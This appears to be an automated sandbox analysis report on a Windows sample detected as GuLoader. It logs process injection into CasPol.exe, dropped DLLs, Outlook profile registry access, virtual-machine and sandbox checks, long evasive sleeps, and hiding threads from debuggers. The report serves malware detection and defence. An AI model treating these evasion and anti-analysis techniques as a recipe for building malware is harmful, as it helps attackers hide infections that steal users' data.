Source: C:\Users\user\Desktop\file.exe Code function: 1_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 1_2_004034F7
Found potential string decryption / allocating functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: String function: 1D2AD148 appears 53 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033BCC1C NtAllocateVirtualMemory, 1_2_033BCC1C
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033BE873 NtProtectVirtualMemory, 1_2_033BE873
Sample file is different than original file name gathered from version info
Source: file.exe, 00000001.00000003.4043105760.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameConfigXML_ScenarioProfile.dllT vs file.exe
Source: file.exe, 00000001.00000003.4045308287.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpCom.dllj% vs file.exe
PE / OLE file has an invalid certificate
Source: file.exe Static PE information: invalid certificate
Source: file.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@10/7@2/2
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\desktop.ini Jump to behavior
Source: file.exe Virustotal: Detection: 26%
Source: file.exe ReversingLabs: Detection: 21%
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\file.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\file.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\file.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\file.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 1_2_004034F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\nsi5456.tmp Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_004021AA CoCreateInstance, 1_2_004021AA
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00404954 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 1_2_00404954
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8960:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8960:304:WilStaging_02
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: file.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: D:\SourceCode\ScenarioProfile\production_V4.2\ScenarioProfileFrameWork\Service\Config_Editor\obj\Release\ConfigXML_ScenarioProfile.pdb, source: file.exe, 00000001.00000003.4043105760.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, ConfigXML_ScenarioProfile.dll.1.dr
Source: Binary string: D:\SourceCode\ScenarioProfile\production_V4.2\ScenarioProfileFrameWork\Service\Config_Editor\obj\Release\ConfigXML_ScenarioProfile.pdb source: file.exe, 00000001.00000003.4043105760.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, ConfigXML_ScenarioProfile.dll.1.dr
Source: Binary string: MsMpCom.pdb source: file.exe, 00000001.00000003.4045308287.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000001.00000002.4859481306.000000000040A000.00000004.00000001.01000000.00000003.sdmp, MsMpCom.dll.1.dr
Source: Binary string: MsMpCom.pdbGCTL source: file.exe, 00000001.00000003.4045308287.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000001.00000002.4859481306.000000000040A000.00000004.00000001.01000000.00000003.sdmp, MsMpCom.dll.1.dr

Data Obfuscation
barindex
Yara detected GuLoader
Source: Yara match File source: 00000001.00000002.4862667877.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.4202992291.0000000000D50000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_70AC30C0 push eax; ret 1_2_70AC30EE
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B3735 push 00000074h; ret 1_2_033B377B
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B3F12 push ecx; iretd 1_2_033B3F66
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B7F9B push esi; retn 9F97h 1_2_033B801C
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B3BF1 push 00000066h; iretd 1_2_033B3BF3
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B664F push 764D0892h; retf 1_2_033B6654
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B3EE6 push ecx; iretd 1_2_033B3F66
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B88AA push BF000001h; iretd 1_2_033B88AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_1FCE8E67 push edi; retn 0000h 6_2_1FCE8E69
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_70AC1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 1_2_70AC1BFF
Drops PE files
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\ConfigXML_ScenarioProfile.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\MsMpCom.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\nsv58DC.tmp\System.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect Any.run
Source: C:\Users\user\Desktop\file.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: file.exe, 00000001.00000002.4863048528.00000000034C1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: file.exe, 00000001.00000002.4863048528.00000000034C1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: NTDLLUSER32KERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 10.0; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLL
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 404 Thread sleep time: -10145709240540247s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Contains long sleeps (>= 3 min)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Window / User API: threadDelayed 9558 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ConfigXML_ScenarioProfile.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MsMpCom.dll Jump to dropped file
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033AD722 rdtsc 1_2_033AD722
Contains functionality to enumerate device drivers
Source: C:\Users\user\Desktop\file.exe Code function: K32EnumDeviceDrivers, 1_2_033BEE62
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: file.exe, 00000001.00000002.4863550435.0000000005039000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000006.00000002.9086018370.0000000002BE9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: file.exe, 00000001.00000002.4863550435.0000000005039000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000006.00000002.9086018370.0000000002BE9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: CasPol.exe, 00000006.00000002.9086018370.0000000002BE9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicshutdown
Source: file.exe, 00000001.00000002.4863550435.0000000005039000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000006.00000002.9086018370.0000000002BE9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: file.exe, 00000001.00000002.4863550435.0000000005039000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000006.00000002.9086018370.0000000002BE9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
Source: file.exe, 00000001.00000002.4863550435.0000000005039000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000006.00000002.9086018370.0000000002BE9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Time Synchronization Service
Source: CasPol.exe, 00000006.00000002.9086018370.0000000002BE9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicvss
Source: CasPol.exe, 00000006.00000003.5393884407.0000000001078000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000006.00000002.9084665856.0000000001078000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000006.00000002.9083705847.0000000001018000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: file.exe, 00000001.00000002.4863048528.00000000034C1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: file.exe, 00000001.00000002.4863550435.0000000005039000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000006.00000002.9086018370.0000000002BE9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: file.exe, 00000001.00000002.4863550435.0000000005039000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000006.00000002.9086018370.0000000002BE9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: file.exe, 00000001.00000002.4863550435.0000000005039000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000006.00000002.9086018370.0000000002BE9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: CasPol.exe, 00000006.00000002.9086018370.0000000002BE9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicheartbeat
Source: file.exe, 00000001.00000002.4863048528.00000000034C1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ntdlluser32kernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\Microsoft.NET\Framework\v4.0.30319\caspol.exewindir=\syswow64\iertutil.dllwindir=\Microsoft.NET\Framework\v4.0.30319\caspol.exewindir=\syswow64\iertutil.dllwindir=\Microsoft.NET\Framework\v4.0.30319\caspol.exewindir=\syswow64\iertutil.dllwindir=\Microsoft.NET\Framework\v4.0.30319\caspol.exewindir=\syswow64\iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00405C13 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 1_2_00405C13
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0040683D FindFirstFileW,FindClose, 1_2_0040683D
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0040290B FindFirstFileW, 1_2_0040290B
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread information set: HideFromDebugger Jump to behavior
Contains functionality to dynamically determine API calls
